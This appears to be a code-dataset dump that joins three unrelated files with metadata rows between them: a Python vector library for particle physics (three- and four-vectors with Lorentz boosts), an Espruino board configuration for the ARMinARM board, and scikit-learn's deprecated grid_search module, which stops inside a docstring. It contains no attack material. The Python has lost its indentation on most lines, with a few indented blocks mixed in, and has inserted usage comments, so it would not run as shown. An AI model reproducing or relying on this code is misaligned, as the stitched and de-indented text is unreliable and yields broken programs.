def __eq__(self, v):
"""Check equality of two vectors."""
if (self.X() == v.X() and
self.Y() == v.Y() and
self.Z() == v.Z()):
return True
return False
def __getitem__(self, key):
"""Allows acces to values via indexing."""
if (key == 0 or key == 'x' or key == 'px'):
return self.X()
if (key == 1 or key == 'y' or key == 'py'):
return self.Y()
if (key == 2 or key == 'z' or key == 'pz'):
return self.Z()
else:
raise AttributeError
def __repr__(self):
return '(%.4f, %.4f, %.4f)' % (self.X(), self.Y(), self.Z())
def __str__(self):
"""Represents vector as a string."""
return '(%.4f, %.4f, %.4f)' % (self.X(), self.Y(), self.Z())
def __imul__(self, scalar):
"""Return product of self and a scalar. This should not be used with
a VecFour."""
self.SetX(self.X() * scalar)
self.SetY(self.Y() * scalar)
self.SetZ(self.Z() * scalar)
return self
    def __iadd__(self, v):
        """Adds another vector to self."""
        self.SetX(self.X() + v.X())
        self.SetY(self.Y() + v.Y())
        self.SetZ(self.Z() + v.Z())
        return self
    def __neg__(self):
        """Flip sign of spatial/momentum components in place."""
        self.SetX(self.X() * -1.)
        self.SetY(self.Y() * -1.)
        self.SetZ(self.Z() * -1.)
        return self
def Generator(self):
for i in xrange(3):
yield self[i]
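# Illustrative usage sketch (not part of the original source):
#
#     p1 = VecThree(1.0, 2.0, 3.0)
#     p2 = VecThree(-1.0, 0.5, 2.0)
#     p1.P()                  # magnitude of the momentum
#     p1.DeltaR(p2)           # sqrt(dEta**2 + dPhi**2)
#     p3 = (p1 + p2) * 2.0    # component-wise sum, then scalar multiplication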
class VecFour(VecThree):
"""Simple four-vector implementation. Every method for retrieving or
setting a value is implemented for both momentum and position. The
methods are interchangeable."""
def __init__(self, x=0, y=0, z=0, t=0):
super(VecFour, self).__init__(x, y, z)
self._t = t
return
def T(self):
"""Return the t-component."""
return self._t
def E(self):
"""Return the e-component."""
return self._t
def M2(self):
"""Return E^2 - P^2."""
return self.T()**2 - (self.X()**2 + self.Y()**2 + self.Z()**2)
def SetT(self, t):
"""Set the t-component."""
self._t = t
def SetE(self, e):
"""Set the e-component."""
self._t = e
def Dot4(self, v):
"""Return E1*E2 - P1*P2."""
return self.T() * v.T() - self.Dot3(v)
def Unit4(self):
"""Return a unit four-vector."""
mag = _sqrt(self._x**2 + self._y**2 + self._z**2 + self._t**2)
return VecFour(self._x / mag,
self._y / mag,
self._z / mag,
self._t / mag)
def BoostVector(self):
"""Return a three-vector conaining Beta-x, Beta-y, and Beta-z."""
bx = self._x / self._t
by = self._y / self._t
bz = self._z / self._t
return VecThree(bx, by, bz)
def Boost(self, v):
"""Boost the vector to the rest-frame of some other vector. It accepts
a VecThree of the components of beta."""
bx = v.X()
by = v.Y()
bz = v.Z()
b2 = bx**2 + by**2 + bz**2
g = 1. / _sqrt(1. - b2)
bp = self.Dot3(v)
if (b2 > 0):
g2 = (g - 1.)/b2
else:
g2 = 0.
self.SetX(self.X() + g2*bp*bx + g*bx*self.T())
self.SetY(self.Y() + g2*bp*by + g*by*self.T())
self.SetZ(self.Z() + g2*bp*bz + g*bz*self.T())
self.SetT(g*(self.T() + bp))
return
def __add__(self, v):
"""Return the vector sum."""
return VecFour(self.X() + v.X(), self.Y() + v.Y(),
self.Z() + v.Z(), self.T() + v.T())
def __sub__(self, v):
"""Return the difference of the vectors' components."""
return VecThree(self.X() - v.X(), self.Y() - v.Y(), self.Z() - v.Z())
def __eq__(self, v):
"""Check equality of two vectors."""
if (self.X() == v.X() and
self.Y() == v.Y() and
self.Z() == v.Z() and
self.T() == v.T()):
return True
return False
def __getitem__(self, key):
if (key == 0 or key == 'x' or key == 'px'):
return self.X()
if (key == 1 or key == 'y' or key == 'py'):
return self.Y()
if (key == 2 or key == 'z' or key == 'pz'):
return self.Z()
if (key == 3 or key == 't' or key == 'e'):
return self.T()
else:
raise AttributeError
def __repr__(self):
return '(%.4f, %.4f, %.4f, %.4f)' % (self.X(), self.Y(),
self.Z(), self.T())
def __str__(self):
"""Represents vector as a string."""
return '(%.4f, %.4f, %.4f, %.4f)' % (self.X(), self.Y(),
self.Z(), self.T())
    def __iadd__(self, v):
        """Adds another vector to self."""
        self.SetX(self.X() + v.X())
        self.SetY(self.Y() + v.Y())
        self.SetZ(self.Z() + v.Z())
        self.SetT(self.T() + v.T())
        return self
def Generator(self):
for i in xrange(4):
yield self[i]
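# Illustrative usage sketch (not part of the original source): boosting a
# four-vector defined in a parent's rest frame into the lab frame.
#
#     parent = VecFour(0.0, 0.0, 3.0, 5.0)   # (px, py, pz, E), so M2() == 16
#     child = VecFour(0.0, 0.0, 0.0, 2.0)    # at rest in the parent frame
#     child.Boost(parent.BoostVector())      # in-place boost by the parent's beta
#     child.M2()                             # invariant mass squared unchanged (4.0)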
| mit | -3,950,602,815,593,994,000 | 24.626039 | 80 | 0.467841 | false |
plumbum/Espruino | boards/ARMINARM.py | 10 | 1909 | #!/bin/false
# This file is part of Espruino, a JavaScript interpreter for Microcontrollers
#
# Copyright (C) 2013 Gordon Williams <[email protected]>
# Adapted for ARMinARM board by Rik Teerling <[email protected]>
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
#
# ----------------------------------------------------------------------------------------
# This file contains information for a specific board - the available pins, and where LEDs,
# Buttons, and other in-built peripherals are. It is used to build documentation as well
# as various source and header files for Espruino.
# ----------------------------------------------------------------------------------------
import pinutils;
info = {
'name' : "ARMinARM addon board for Raspberry Pi B+",
'link' : [ "https://www.onandoffables.com/" ],
'variables' : 3250,
'binary_name' : 'espruino_%v_ARMinARM.bin',
};
chip = {
'part' : "STM32F103RET6",
'family' : "STM32F1",
'package' : "LQFP64",
'ram' : 64,
'flash' : 512,
'speed' : 72,
'usart' : 5,
'spi' : 3,
'i2c' : 2,
'adc' : 3,
'dac' : 2,
};
devices = {
'OSC' : { 'pin_in' : 'D0',
'pin_out' : 'D1' },
'OSC_RTC' : { 'pin_in' : 'C14',
'pin_out' : 'C15' },
'LED1' : { 'pin' : 'B0' },
'BTN1' : { 'pin' : 'A0' },
'USB' : { 'pin_disc' : 'C13',
'pin_dm' : 'A11',
'pin_dp' : 'A12' },
'SD' : { 'pin_cs' : 'D2',
'pin_di' : 'B15',
'pin_do' : 'B14',
'pin_clk' : 'B13' },
# 'BLUETOOTH' : { 'pin_tx' : 'A9',
# 'pin_rx' : 'A10' },
};
def get_pins():
pins = pinutils.scan_pin_file([], 'stm32f103xe.csv', 6, 10, 11)
return pinutils.only_from_package(pinutils.fill_gaps_in_pin_list(pins), chip["package"])
| mpl-2.0 | 6,897,063,170,603,100,000 | 32.491228 | 91 | 0.513882 | false |
ClimbsRocks/scikit-learn | sklearn/grid_search.py | 2 | 38534 | """
The :mod:`sklearn.grid_search` includes utilities to fine-tune the parameters
of an estimator.
"""
from __future__ import print_function
# Author: Alexandre Gramfort <[email protected]>,
# Gael Varoquaux <[email protected]>
# Andreas Mueller <[email protected]>
# Olivier Grisel <[email protected]>
# License: BSD 3 clause
from abc import ABCMeta, abstractmethod
from collections import Mapping, namedtuple, Sized
from functools import partial, reduce
from itertools import product
import operator
import warnings
import numpy as np
from .base import BaseEstimator, is_classifier, clone
from .base import MetaEstimatorMixin
from .cross_validation import check_cv
from .cross_validation import _fit_and_score
from .externals.joblib import Parallel, delayed
from .externals import six
from .utils import check_random_state
from .utils.random import sample_without_replacement
from .utils.validation import _num_samples, indexable
from .utils.metaestimators import if_delegate_has_method
from .metrics.scorer import check_scoring
from .exceptions import ChangedBehaviorWarning
__all__ = ['GridSearchCV', 'ParameterGrid', 'fit_grid_point',
'ParameterSampler', 'RandomizedSearchCV']
warnings.warn("This module was deprecated in version 0.18 in favor of the "
"model_selection module into which all the refactored classes "
"and functions are moved. This module will be removed in 0.20.",
DeprecationWarning)
class ParameterGrid(object):
"""Grid of parameters with a discrete number of values for each.
Can be used to iterate over parameter value combinations with the
Python built-in function iter.
Read more in the :ref:`User Guide <grid_search>`.
Parameters
----------
param_grid : dict of string to sequence, or sequence of such
The parameter grid to explore, as a dictionary mapping estimator
parameters to sequences of allowed values.
An empty dict signifies default parameters.
A sequence of dicts signifies a sequence of grids to search, and is
useful to avoid exploring parameter combinations that make no sense
or have no effect. See the examples below.
Examples
--------
>>> from sklearn.grid_search import ParameterGrid
>>> param_grid = {'a': [1, 2], 'b': [True, False]}
>>> list(ParameterGrid(param_grid)) == (
... [{'a': 1, 'b': True}, {'a': 1, 'b': False},
... {'a': 2, 'b': True}, {'a': 2, 'b': False}])
True
>>> grid = [{'kernel': ['linear']}, {'kernel': ['rbf'], 'gamma': [1, 10]}]
>>> list(ParameterGrid(grid)) == [{'kernel': 'linear'},
... {'kernel': 'rbf', 'gamma': 1},
... {'kernel': 'rbf', 'gamma': 10}]
True
>>> ParameterGrid(grid)[1] == {'kernel': 'rbf', 'gamma': 1}
True
See also
--------
:class:`GridSearchCV`:
uses ``ParameterGrid`` to perform a full parallelized parameter search.
"""
def __init__(self, param_grid):
if isinstance(param_grid, Mapping):
# wrap dictionary in a singleton list to support either dict
# or list of dicts
param_grid = [param_grid]
self.param_grid = param_grid
def __iter__(self):
"""Iterate over the points in the grid.
Returns
-------
params : iterator over dict of string to any
Yields dictionaries mapping each estimator parameter to one of its
allowed values.
"""
for p in self.param_grid:
# Always sort the keys of a dictionary, for reproducibility
items = sorted(p.items())
if not items:
yield {}
else:
keys, values = zip(*items)
for v in product(*values):
params = dict(zip(keys, v))
yield params
def __len__(self):
"""Number of points on the grid."""
# Product function that can handle iterables (np.product can't).
product = partial(reduce, operator.mul)
return sum(product(len(v) for v in p.values()) if p else 1
for p in self.param_grid)
def __getitem__(self, ind):
"""Get the parameters that would be ``ind``th in iteration
Parameters
----------
ind : int
The iteration index
Returns
-------
params : dict of string to any
Equal to list(self)[ind]
"""
# This is used to make discrete sampling without replacement memory
# efficient.
for sub_grid in self.param_grid:
# XXX: could memoize information used here
if not sub_grid:
if ind == 0:
return {}
else:
ind -= 1
continue
# Reverse so most frequent cycling parameter comes first
keys, values_lists = zip(*sorted(sub_grid.items())[::-1])
sizes = [len(v_list) for v_list in values_lists]
total = np.product(sizes)
if ind >= total:
# Try the next grid
ind -= total
else:
out = {}
for key, v_list, n in zip(keys, values_lists, sizes):
ind, offset = divmod(ind, n)
out[key] = v_list[offset]
return out
raise IndexError('ParameterGrid index out of range')
class ParameterSampler(object):
"""Generator on parameters sampled from given distributions.
Non-deterministic iterable over random candidate combinations for hyper-
parameter search. If all parameters are presented as a list,
sampling without replacement is performed. If at least one parameter
is given as a distribution, sampling with replacement is used.
It is highly recommended to use continuous distributions for continuous
parameters.
Note that as of SciPy 0.12, the ``scipy.stats.distributions`` do not accept
a custom RNG instance and always use the singleton RNG from
``numpy.random``. Hence setting ``random_state`` will not guarantee a
deterministic iteration whenever ``scipy.stats`` distributions are used to
define the parameter search space.
Read more in the :ref:`User Guide <grid_search>`.
Parameters
----------
param_distributions : dict
Dictionary where the keys are parameters and values
are distributions from which a parameter is to be sampled.
Distributions either have to provide a ``rvs`` function
to sample from them, or can be given as a list of values,
where a uniform distribution is assumed.
n_iter : integer
Number of parameter settings that are produced.
random_state : int or RandomState
Pseudo random number generator state used for random uniform sampling
from lists of possible values instead of scipy.stats distributions.
Returns
-------
params : dict of string to any
**Yields** dictionaries mapping each estimator parameter to
        a sampled value.
Examples
--------
>>> from sklearn.grid_search import ParameterSampler
>>> from scipy.stats.distributions import expon
>>> import numpy as np
>>> np.random.seed(0)
>>> param_grid = {'a':[1, 2], 'b': expon()}
>>> param_list = list(ParameterSampler(param_grid, n_iter=4))
>>> rounded_list = [dict((k, round(v, 6)) for (k, v) in d.items())
... for d in param_list]
>>> rounded_list == [{'b': 0.89856, 'a': 1},
... {'b': 0.923223, 'a': 1},
... {'b': 1.878964, 'a': 2},
... {'b': 1.038159, 'a': 2}]
True
"""
def __init__(self, param_distributions, n_iter, random_state=None):
self.param_distributions = param_distributions
self.n_iter = n_iter
self.random_state = random_state
def __iter__(self):
# check if all distributions are given as lists
# in this case we want to sample without replacement
all_lists = np.all([not hasattr(v, "rvs")
for v in self.param_distributions.values()])
rnd = check_random_state(self.random_state)
if all_lists:
# look up sampled parameter settings in parameter grid
param_grid = ParameterGrid(self.param_distributions)
grid_size = len(param_grid)
if grid_size < self.n_iter:
raise ValueError(
"The total space of parameters %d is smaller "
"than n_iter=%d." % (grid_size, self.n_iter)
+ " For exhaustive searches, use GridSearchCV.")
for i in sample_without_replacement(grid_size, self.n_iter,
random_state=rnd):
yield param_grid[i]
else:
# Always sort the keys of a dictionary, for reproducibility
items = sorted(self.param_distributions.items())
for _ in six.moves.range(self.n_iter):
params = dict()
for k, v in items:
if hasattr(v, "rvs"):
params[k] = v.rvs()
else:
params[k] = v[rnd.randint(len(v))]
yield params
def __len__(self):
"""Number of points that will be sampled."""
return self.n_iter
def fit_grid_point(X, y, estimator, parameters, train, test, scorer,
verbose, error_score='raise', **fit_params):
"""Run fit on one set of parameters.
Parameters
----------
X : array-like, sparse matrix or list
Input data.
y : array-like or None
Targets for input data.
estimator : estimator object
A object of that type is instantiated for each grid point.
This is assumed to implement the scikit-learn estimator interface.
Either estimator needs to provide a ``score`` function,
or ``scoring`` must be passed.
parameters : dict
Parameters to be set on estimator for this grid point.
train : ndarray, dtype int or bool
Boolean mask or indices for training set.
test : ndarray, dtype int or bool
Boolean mask or indices for test set.
scorer : callable or None.
If provided must be a scorer callable object / function with signature
``scorer(estimator, X, y)``.
verbose : int
Verbosity level.
**fit_params : kwargs
Additional parameter passed to the fit function of the estimator.
error_score : 'raise' (default) or numeric
Value to assign to the score if an error occurs in estimator fitting.
If set to 'raise', the error is raised. If a numeric value is given,
FitFailedWarning is raised. This parameter does not affect the refit
step, which will always raise the error.
Returns
-------
score : float
Score of this parameter setting on given training / test split.
parameters : dict
The parameters that have been evaluated.
n_samples_test : int
Number of test samples in this split.
"""
score, n_samples_test, _ = _fit_and_score(estimator, X, y, scorer, train,
test, verbose, parameters,
fit_params, error_score)
return score, parameters, n_samples_test
def _check_param_grid(param_grid):
if hasattr(param_grid, 'items'):
param_grid = [param_grid]
for p in param_grid:
for v in p.values():
if isinstance(v, np.ndarray) and v.ndim > 1:
raise ValueError("Parameter array should be one-dimensional.")
check = [isinstance(v, k) for k in (list, tuple, np.ndarray)]
if True not in check:
raise ValueError("Parameter values should be a list.")
if len(v) == 0:
raise ValueError("Parameter values should be a non-empty "
"list.")
class _CVScoreTuple (namedtuple('_CVScoreTuple',
('parameters',
'mean_validation_score',
'cv_validation_scores'))):
# A raw namedtuple is very memory efficient as it packs the attributes
# in a struct to get rid of the __dict__ of attributes in particular it
# does not copy the string for the keys on each instance.
# By deriving a namedtuple class just to introduce the __repr__ method we
# would also reintroduce the __dict__ on the instance. By telling the
# Python interpreter that this subclass uses static __slots__ instead of
# dynamic attributes. Furthermore we don't need any additional slot in the
# subclass so we set __slots__ to the empty tuple.
__slots__ = ()
def __repr__(self):
"""Simple custom repr to summarize the main info"""
return "mean: {0:.5f}, std: {1:.5f}, params: {2}".format(
self.mean_validation_score,
np.std(self.cv_validation_scores),
self.parameters)
class BaseSearchCV(six.with_metaclass(ABCMeta, BaseEstimator,
MetaEstimatorMixin)):
"""Base class for hyper parameter search with cross-validation."""
@abstractmethod
def __init__(self, estimator, scoring=None,
fit_params=None, n_jobs=1, iid=True,
refit=True, cv=None, verbose=0, pre_dispatch='2*n_jobs',
error_score='raise'):
self.scoring = scoring
self.estimator = estimator
self.n_jobs = n_jobs
self.fit_params = fit_params if fit_params is not None else {}
self.iid = iid
self.refit = refit
self.cv = cv
self.verbose = verbose
self.pre_dispatch = pre_dispatch
self.error_score = error_score
@property
def _estimator_type(self):
return self.estimator._estimator_type
def score(self, X, y=None):
"""Returns the score on the given data, if the estimator has been refit.
This uses the score defined by ``scoring`` where provided, and the
``best_estimator_.score`` method otherwise.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Input data, where n_samples is the number of samples and
n_features is the number of features.
y : array-like, shape = [n_samples] or [n_samples, n_output], optional
Target relative to X for classification or regression;
None for unsupervised learning.
Returns
-------
score : float
Notes
-----
* The long-standing behavior of this method changed in version 0.16.
* It no longer uses the metric provided by ``estimator.score`` if the
``scoring`` parameter was set when fitting.
"""
if self.scorer_ is None:
raise ValueError("No score function explicitly defined, "
"and the estimator doesn't provide one %s"
% self.best_estimator_)
if self.scoring is not None and hasattr(self.best_estimator_, 'score'):
warnings.warn("The long-standing behavior to use the estimator's "
"score function in {0}.score has changed. The "
"scoring parameter is now used."
"".format(self.__class__.__name__),
ChangedBehaviorWarning)
return self.scorer_(self.best_estimator_, X, y)
@if_delegate_has_method(delegate='estimator')
def predict(self, X):
"""Call predict on the estimator with the best found parameters.
Only available if ``refit=True`` and the underlying estimator supports
``predict``.
Parameters
-----------
X : indexable, length n_samples
Must fulfill the input assumptions of the
underlying estimator.
"""
return self.best_estimator_.predict(X)
@if_delegate_has_method(delegate='estimator')
def predict_proba(self, X):
"""Call predict_proba on the estimator with the best found parameters.
Only available if ``refit=True`` and the underlying estimator supports
``predict_proba``.
Parameters
-----------
X : indexable, length n_samples
Must fulfill the input assumptions of the
underlying estimator.
"""
return self.best_estimator_.predict_proba(X)
@if_delegate_has_method(delegate='estimator')
def predict_log_proba(self, X):
"""Call predict_log_proba on the estimator with the best found parameters.
Only available if ``refit=True`` and the underlying estimator supports
``predict_log_proba``.
Parameters
-----------
X : indexable, length n_samples
Must fulfill the input assumptions of the
underlying estimator.
"""
return self.best_estimator_.predict_log_proba(X)
@if_delegate_has_method(delegate='estimator')
def decision_function(self, X):
"""Call decision_function on the estimator with the best found parameters.
Only available if ``refit=True`` and the underlying estimator supports
``decision_function``.
Parameters
-----------
X : indexable, length n_samples
Must fulfill the input assumptions of the
underlying estimator.
"""
return self.best_estimator_.decision_function(X)
@if_delegate_has_method(delegate='estimator')
def transform(self, X):
"""Call transform on the estimator with the best found parameters.
Only available if the underlying estimator supports ``transform`` and
``refit=True``.
Parameters
-----------
X : indexable, length n_samples
Must fulfill the input assumptions of the
underlying estimator.
"""
return self.best_estimator_.transform(X)
@if_delegate_has_method(delegate='estimator')
def inverse_transform(self, Xt):
"""Call inverse_transform on the estimator with the best found parameters.
Only available if the underlying estimator implements ``inverse_transform`` and
``refit=True``.
Parameters
-----------
Xt : indexable, length n_samples
Must fulfill the input assumptions of the
underlying estimator.
"""
        return self.best_estimator_.inverse_transform(Xt)
def _fit(self, X, y, parameter_iterable):
"""Actual fitting, performing the search over parameters."""
estimator = self.estimator
cv = self.cv
self.scorer_ = check_scoring(self.estimator, scoring=self.scoring)
n_samples = _num_samples(X)
X, y = indexable(X, y)
if y is not None:
if len(y) != n_samples:
raise ValueError('Target variable (y) has a different number '
'of samples (%i) than data (X: %i samples)'
% (len(y), n_samples))
cv = check_cv(cv, X, y, classifier=is_classifier(estimator))
if self.verbose > 0:
if isinstance(parameter_iterable, Sized):
n_candidates = len(parameter_iterable)
print("Fitting {0} folds for each of {1} candidates, totalling"
" {2} fits".format(len(cv), n_candidates,
n_candidates * len(cv)))
base_estimator = clone(self.estimator)
pre_dispatch = self.pre_dispatch
out = Parallel(
n_jobs=self.n_jobs, verbose=self.verbose,
pre_dispatch=pre_dispatch
)(
delayed(_fit_and_score)(clone(base_estimator), X, y, self.scorer_,
train, test, self.verbose, parameters,
self.fit_params, return_parameters=True,
error_score=self.error_score)
for parameters in parameter_iterable
for train, test in cv)
# Out is a list of triplet: score, estimator, n_test_samples
n_fits = len(out)
n_folds = len(cv)
scores = list()
grid_scores = list()
for grid_start in range(0, n_fits, n_folds):
n_test_samples = 0
score = 0
all_scores = []
for this_score, this_n_test_samples, _, parameters in \
out[grid_start:grid_start + n_folds]:
all_scores.append(this_score)
if self.iid:
this_score *= this_n_test_samples
n_test_samples += this_n_test_samples
score += this_score
if self.iid:
score /= float(n_test_samples)
else:
score /= float(n_folds)
scores.append((score, parameters))
# TODO: shall we also store the test_fold_sizes?
grid_scores.append(_CVScoreTuple(
parameters,
score,
np.array(all_scores)))
# Store the computed scores
self.grid_scores_ = grid_scores
# Find the best parameters by comparing on the mean validation score:
# note that `sorted` is deterministic in the way it breaks ties
best = sorted(grid_scores, key=lambda x: x.mean_validation_score,
reverse=True)[0]
self.best_params_ = best.parameters
self.best_score_ = best.mean_validation_score
if self.refit:
# fit the best estimator using the entire dataset
# clone first to work around broken estimators
best_estimator = clone(base_estimator).set_params(
**best.parameters)
if y is not None:
best_estimator.fit(X, y, **self.fit_params)
else:
best_estimator.fit(X, **self.fit_params)
self.best_estimator_ = best_estimator
return self
class GridSearchCV(BaseSearchCV):
"""Exhaustive search over specified parameter values for an estimator.
Important members are fit, predict.
GridSearchCV implements a "fit" and a "score" method.
It also implements "predict", "predict_proba", "decision_function",
"transform" and "inverse_transform" if they are implemented in the
estimator used.
The parameters of the estimator used to apply these methods are optimized
by cross-validated grid-search over a parameter grid.
Read more in the :ref:`User Guide <grid_search>`.
Parameters
----------
estimator : estimator object.
A object of that type is instantiated for each grid point.
This is assumed to implement the scikit-learn estimator interface.
Either estimator needs to provide a ``score`` function,
or ``scoring`` must be passed.
param_grid : dict or list of dictionaries
Dictionary with parameters names (string) as keys and lists of
parameter settings to try as values, or a list of such
dictionaries, in which case the grids spanned by each dictionary
in the list are explored. This enables searching over any sequence
of parameter settings.
scoring : string, callable or None, default=None
A string (see model evaluation documentation) or
a scorer callable object / function with signature
``scorer(estimator, X, y)``.
If ``None``, the ``score`` method of the estimator is used.
fit_params : dict, optional
Parameters to pass to the fit method.
n_jobs : int, default=1
Number of jobs to run in parallel.
.. versionchanged:: 0.17
Upgraded to joblib 0.9.3.
pre_dispatch : int, or string, optional
Controls the number of jobs that get dispatched during parallel
execution. Reducing this number can be useful to avoid an
explosion of memory consumption when more jobs get dispatched
than CPUs can process. This parameter can be:
- None, in which case all the jobs are immediately
created and spawned. Use this for lightweight and
fast-running jobs, to avoid delays due to on-demand
spawning of the jobs
- An int, giving the exact number of total jobs that are
spawned
- A string, giving an expression as a function of n_jobs,
as in '2*n_jobs'
iid : boolean, default=True
If True, the data is assumed to be identically distributed across
the folds, and the loss minimized is the total loss per sample,
and not the mean loss across the folds.
cv : int, cross-validation generator or an iterable, optional
Determines the cross-validation splitting strategy.
Possible inputs for cv are:
- None, to use the default 3-fold cross-validation,
- integer, to specify the number of folds.
- An object to be used as a cross-validation generator.
- An iterable yielding train/test splits.
For integer/None inputs, if the estimator is a classifier and ``y`` is
either binary or multiclass,
:class:`sklearn.model_selection.StratifiedKFold` is used. In all
other cases, :class:`sklearn.model_selection.KFold` is used.
Refer :ref:`User Guide <cross_validation>` for the various
cross-validation strategies that can be used here.
refit : boolean, default=True
Refit the best estimator with the entire dataset.
If "False", it is impossible to make predictions using
this GridSearchCV instance after fitting.
verbose : integer
Controls the verbosity: the higher, the more messages.
error_score : 'raise' (default) or numeric
Value to assign to the score if an error occurs in estimator fitting.
If set to 'raise', the error is raised. If a numeric value is given,
FitFailedWarning is raised. This parameter does not affect the refit
step, which will always raise the error.
Examples
--------
>>> from sklearn import svm, grid_search, datasets
>>> iris = datasets.load_iris()
>>> parameters = {'kernel':('linear', 'rbf'), 'C':[1, 10]}
>>> svr = svm.SVC()
>>> clf = grid_search.GridSearchCV(svr, parameters)
>>> clf.fit(iris.data, iris.target)
... # doctest: +NORMALIZE_WHITESPACE +ELLIPSIS
GridSearchCV(cv=None, error_score=...,
estimator=SVC(C=1.0, cache_size=..., class_weight=..., coef0=...,
decision_function_shape=None, degree=..., gamma=...,
kernel='rbf', max_iter=-1, probability=False,
random_state=None, shrinking=True, tol=...,
verbose=False),
fit_params={}, iid=..., n_jobs=1,
param_grid=..., pre_dispatch=..., refit=...,
scoring=..., verbose=...)
Attributes
----------
grid_scores_ : list of named tuples
Contains scores for all parameter combinations in param_grid.
Each entry corresponds to one parameter setting.
Each named tuple has the attributes:
* ``parameters``, a dict of parameter settings
* ``mean_validation_score``, the mean score over the
cross-validation folds
* ``cv_validation_scores``, the list of scores for each fold
best_estimator_ : estimator
Estimator that was chosen by the search, i.e. estimator
which gave highest score (or smallest loss if specified)
on the left out data. Not available if refit=False.
best_score_ : float
Score of best_estimator on the left out data.
best_params_ : dict
Parameter setting that gave the best results on the hold out data.
scorer_ : function
Scorer function used on the held out data to choose the best
parameters for the model.
Notes
------
The parameters selected are those that maximize the score of the left out
data, unless an explicit score is passed in which case it is used instead.
If `n_jobs` was set to a value higher than one, the data is copied for each
point in the grid (and not `n_jobs` times). This is done for efficiency
reasons if individual jobs take very little time, but may raise errors if
the dataset is large and not enough memory is available. A workaround in
this case is to set `pre_dispatch`. Then, the memory is copied only
`pre_dispatch` many times. A reasonable value for `pre_dispatch` is `2 *
n_jobs`.
See Also
---------
:class:`ParameterGrid`:
generates all the combinations of a hyperparameter grid.
:func:`sklearn.cross_validation.train_test_split`:
utility function to split the data into a development set usable
for fitting a GridSearchCV instance and an evaluation set for
its final evaluation.
:func:`sklearn.metrics.make_scorer`:
Make a scorer from a performance metric or loss function.
"""
def __init__(self, estimator, param_grid, scoring=None, fit_params=None,
n_jobs=1, iid=True, refit=True, cv=None, verbose=0,
pre_dispatch='2*n_jobs', error_score='raise'):
super(GridSearchCV, self).__init__(
estimator, scoring, fit_params, n_jobs, iid,
refit, cv, verbose, pre_dispatch, error_score)
self.param_grid = param_grid
_check_param_grid(param_grid)
def fit(self, X, y=None):
"""Run fit with all sets of parameters.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Training vector, where n_samples is the number of samples and
n_features is the number of features.
y : array-like, shape = [n_samples] or [n_samples, n_output], optional
Target relative to X for classification or regression;
None for unsupervised learning.
"""
return self._fit(X, y, ParameterGrid(self.param_grid))
class RandomizedSearchCV(BaseSearchCV):
"""Randomized search on hyper parameters.
RandomizedSearchCV implements a "fit" and a "score" method.
It also implements "predict", "predict_proba", "decision_function",
"transform" and "inverse_transform" if they are implemented in the
estimator used.
The parameters of the estimator used to apply these methods are optimized
by cross-validated search over parameter settings.
In contrast to GridSearchCV, not all parameter values are tried out, but
rather a fixed number of parameter settings is sampled from the specified
distributions. The number of parameter settings that are tried is
given by n_iter.
If all parameters are presented as a list,
sampling without replacement is performed. If at least one parameter
is given as a distribution, sampling with replacement is used.
It is highly recommended to use continuous distributions for continuous
parameters.
Read more in the :ref:`User Guide <randomized_parameter_search>`.
Parameters
----------
estimator : estimator object.
A object of that type is instantiated for each grid point.
This is assumed to implement the scikit-learn estimator interface.
Either estimator needs to provide a ``score`` function,
or ``scoring`` must be passed.
param_distributions : dict
Dictionary with parameters names (string) as keys and distributions
or lists of parameters to try. Distributions must provide a ``rvs``
method for sampling (such as those from scipy.stats.distributions).
If a list is given, it is sampled uniformly.
n_iter : int, default=10
Number of parameter settings that are sampled. n_iter trades
off runtime vs quality of the solution.
scoring : string, callable or None, default=None
A string (see model evaluation documentation) or
a scorer callable object / function with signature
``scorer(estimator, X, y)``.
If ``None``, the ``score`` method of the estimator is used.
fit_params : dict, optional
Parameters to pass to the fit method.
n_jobs : int, default=1
Number of jobs to run in parallel.
pre_dispatch : int, or string, optional
Controls the number of jobs that get dispatched during parallel
execution. Reducing this number can be useful to avoid an
explosion of memory consumption when more jobs get dispatched
than CPUs can process. This parameter can be:
- None, in which case all the jobs are immediately
created and spawned. Use this for lightweight and
fast-running jobs, to avoid delays due to on-demand
spawning of the jobs
- An int, giving the exact number of total jobs that are
spawned
- A string, giving an expression as a function of n_jobs,
as in '2*n_jobs'
iid : boolean, default=True
If True, the data is assumed to be identically distributed across
the folds, and the loss minimized is the total loss per sample,
and not the mean loss across the folds.
cv : int, cross-validation generator or an iterable, optional
Determines the cross-validation splitting strategy.
Possible inputs for cv are:
- None, to use the default 3-fold cross-validation,
- integer, to specify the number of folds.
- An object to be used as a cross-validation generator.
- An iterable yielding train/test splits.
For integer/None inputs, if the estimator is a classifier and ``y`` is
either binary or multiclass,
:class:`sklearn.model_selection.StratifiedKFold` is used. In all
other cases, :class:`sklearn.model_selection.KFold` is used.
Refer :ref:`User Guide <cross_validation>` for the various
cross-validation strategies that can be used here.
refit : boolean, default=True
Refit the best estimator with the entire dataset.
If "False", it is impossible to make predictions using
this RandomizedSearchCV instance after fitting.
verbose : integer
Controls the verbosity: the higher, the more messages.
random_state : int or RandomState
Pseudo random number generator state used for random uniform sampling
from lists of possible values instead of scipy.stats distributions.
error_score : 'raise' (default) or numeric
Value to assign to the score if an error occurs in estimator fitting.
If set to 'raise', the error is raised. If a numeric value is given,
FitFailedWarning is raised. This parameter does not affect the refit
step, which will always raise the error.
Attributes
----------
grid_scores_ : list of named tuples
Contains scores for all parameter combinations in param_grid.
Each entry corresponds to one parameter setting.
Each named tuple has the attributes:
* ``parameters``, a dict of parameter settings
* ``mean_validation_score``, the mean score over the
cross-validation folds
* ``cv_validation_scores``, the list of scores for each fold
best_estimator_ : estimator
Estimator that was chosen by the search, i.e. estimator
which gave highest score (or smallest loss if specified)
on the left out data. Not available if refit=False.
best_score_ : float
Score of best_estimator on the left out data.
best_params_ : dict
Parameter setting that gave the best results on the hold out data.
Notes
-----
The parameters selected are those that maximize the score of the held-out
data, according to the scoring parameter.
If `n_jobs` was set to a value higher than one, the data is copied for each
    parameter setting (and not `n_jobs` times). This is done for efficiency
reasons if individual jobs take very little time, but may raise errors if
the dataset is large and not enough memory is available. A workaround in
this case is to set `pre_dispatch`. Then, the memory is copied only
`pre_dispatch` many times. A reasonable value for `pre_dispatch` is `2 *
n_jobs`.
See Also
--------
:class:`GridSearchCV`:
Does exhaustive search over a grid of parameters.
:class:`ParameterSampler`:
A generator over parameter settings, constructed from
param_distributions.
"""
